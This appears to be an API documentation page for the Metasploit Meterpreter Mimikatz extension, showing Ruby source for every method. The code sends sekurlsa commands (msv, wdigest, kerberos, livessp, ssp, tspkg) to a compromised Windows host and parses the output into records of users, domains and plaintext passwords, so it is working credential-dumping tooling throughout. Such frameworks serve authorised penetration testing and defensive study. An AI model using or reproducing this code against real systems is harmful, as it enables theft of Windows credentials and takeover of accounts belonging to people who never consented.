Class: Rex::Post::Meterpreter::Extensions::Mimikatz::Mimikatz
- Inherits:
-
Rex::Post::Meterpreter::Extension
- Object
- Rex::Post::Meterpreter::Extension
- Rex::Post::Meterpreter::Extensions::Mimikatz::Mimikatz
- Defined in:
- lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb
Overview
Mimikatz extension - grabs credentials from windows memory.
Benjamin DELPY `gentilkiwi` blog.gentilkiwi.com/mimikatz
Extension converted by Ben Campbell (Meatballs).
Constructor Details
#initialize(client) ⇒ Mimikatz
Returns a new instance of Mimikatz.
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 24
# Creates the extension, registering it with the client under the extension
# name 'mimikatz' and exposing the instance through the 'mimikatz' alias.
#
# @param client [Object] the client object this extension is attached to
def initialize(client)
  super(client, 'mimikatz')
  aliases = [{ 'name' => 'mimikatz', 'ext' => self }]
  client.register_extension_aliases(aliases)
end
Instance Method Details
#kerberos ⇒ Object
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 121
# Sends the +sekurlsa::kerberos+ custom command and parses its CSV result.
#
# @return [Array<Hash>] one account hash per result row, see #parse_creds_result
def kerberos
  parse_creds_result(send_custom_command('sekurlsa::kerberos'))
end
#livessp ⇒ Object
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 106
# Sends the +sekurlsa::livessp+ custom command and parses its CSV result.
#
# @return [Array<Hash>] one account hash per result row, see #parse_creds_result
def livessp
  parse_creds_result(send_custom_command('sekurlsa::livessp'))
end
#msv ⇒ Object
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 101
# Sends the +sekurlsa::msv+ custom command and parses its CSV result.
#
# @return [Array<Hash>] one account hash per result row, see #parse_creds_result
def msv
  parse_creds_result(send_custom_command('sekurlsa::msv'))
end
#parse_creds_result(result) ⇒ Object
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 50
# Parses the CSV text returned by a +sekurlsa+ credential command into an
# array of account hashes. Rows are read positionally: column 0 is the auth
# id, 1 the package, 2 the user, 3 the domain and 4 the password. A row with
# fewer columns yields +nil+ for the missing keys; an empty string yields [].
#
# @param result [String] CSV text as returned by #send_custom_command
# @return [Array<Hash>] hashes with keys :authid, :package, :user, :domain
#   and :password, in row order
# @raise [CSV::MalformedCSVError] if +result+ is not well-formed CSV
def parse_creds_result(result)
  CSV.parse(result).map do |authid, package, user, domain, password|
    {
      authid: authid,
      package: package,
      user: user,
      domain: domain,
      password: password
    }
  end
end
#parse_ssp_result(result) ⇒ Object
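# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 66
# Parses the CSV text returned by +sekurlsa::ssp+ into one account hash per
# SSP credential entry. Only rows with exactly five columns are used; the
# fifth column holds zero or more entries separated by " }", each of the form
# "{ user ; domain ; password", and one hash is produced per entry. Rows with
# a different column count, an empty fifth column (parsed as +nil+ by CSV),
# blank entries, or entries without a "{ " marker before the user are skipped
# instead of raising.
#
# @param result [String] CSV text as returned by #send_custom_command
# @return [Array<Hash>] hashes with keys :authid, :package, :user, :domain,
#   :password (taken from the entry) and :orig_user, :orig_domain (row
#   columns 2 and 3)
# @raise [CSV::MalformedCSVError] if +result+ is not well-formed CSV
def parse_ssp_result(result)
  accounts = []
  CSV.parse(result).each do |acc|
    # Only the five-column layout is understood; anything else is skipped.
    next unless acc.length == 5
    authid, package, orig_user, orig_domain, entries = acc
    # CSV parses an empty trailing field as nil; there is nothing to split.
    next unless entries
    entries.split(' }').each do |entry|
      fields = entry.split(' ; ')
      # An empty entry (e.g. a leading " }") splits to no fields at all;
      # indexing it would raise, so skip it.
      next if fields.empty?
      # The user is whatever follows the "{ " marker in the first field.
      user = fields[0].split('{ ')[1]
      next unless user
      accounts << {
        authid: authid,
        package: package,
        user: user,
        domain: fields[1],
        password: fields[2],
        orig_user: orig_user,
        orig_domain: orig_domain
      }
    end
  end
  accounts
end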
#send_custom_command(function, args = []) ⇒ Object
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 46
# Sends a custom mimikatz command and returns its result converted to ASCII
# with Rex::Text.to_ascii. See #send_custom_command_raw for the unconverted value.
#
# @param function [String] the mimikatz function to run, e.g. 'sekurlsa::msv'
# @param args [Array] additional arguments, each sent as its own TLV
# @return [String] the ASCII-converted result
def send_custom_command(function, args=[])
  raw = send_custom_command_raw(function, args)
  Rex::Text.to_ascii(raw)
end
#send_custom_command_raw(function, args = []) ⇒ Object
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 36
# Builds a +mimikatz_custom_command+ request carrying the function name and
# one TLV_TYPE_MIMIKATZ_ARGUMENT TLV per argument, sends it through the client
# and returns the TLV_TYPE_MIMIKATZ_RESULT value of the response without any
# encoding conversion.
#
# @param function [String] the mimikatz function to run
# @param args [Array] additional arguments, each added as its own TLV
# @return [Object] the raw TLV_TYPE_MIMIKATZ_RESULT value (nil if absent,
#   presumably — depends on get_tlv_value)
def send_custom_command_raw(function, args=[])
  request = Packet.create_request('mimikatz_custom_command')
  request.add_tlv(TLV_TYPE_MIMIKATZ_FUNCTION, function)
  args.each { |arg| request.add_tlv(TLV_TYPE_MIMIKATZ_ARGUMENT, arg) }
  client.send_request(request).get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT)
end
#ssp ⇒ Object
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 111
# Sends the +sekurlsa::ssp+ custom command and parses its CSV result with the
# SSP-specific parser (one hash per embedded entry).
#
# @return [Array<Hash>] see #parse_ssp_result
def ssp
  parse_ssp_result(send_custom_command('sekurlsa::ssp'))
end
#tspkg ⇒ Object
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 116
# Sends the +sekurlsa::tspkg+ custom command and parses its CSV result.
#
# @return [Array<Hash>] one account hash per result row, see #parse_creds_result
def tspkg
  parse_creds_result(send_custom_command('sekurlsa::tspkg'))
end
#wdigest ⇒ Object
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 96
# Sends the +sekurlsa::wdigest+ custom command and parses its CSV result.
#
# @return [Array<Hash>] one account hash per result row, see #parse_creds_result
def wdigest
  parse_creds_result(send_custom_command('sekurlsa::wdigest'))
end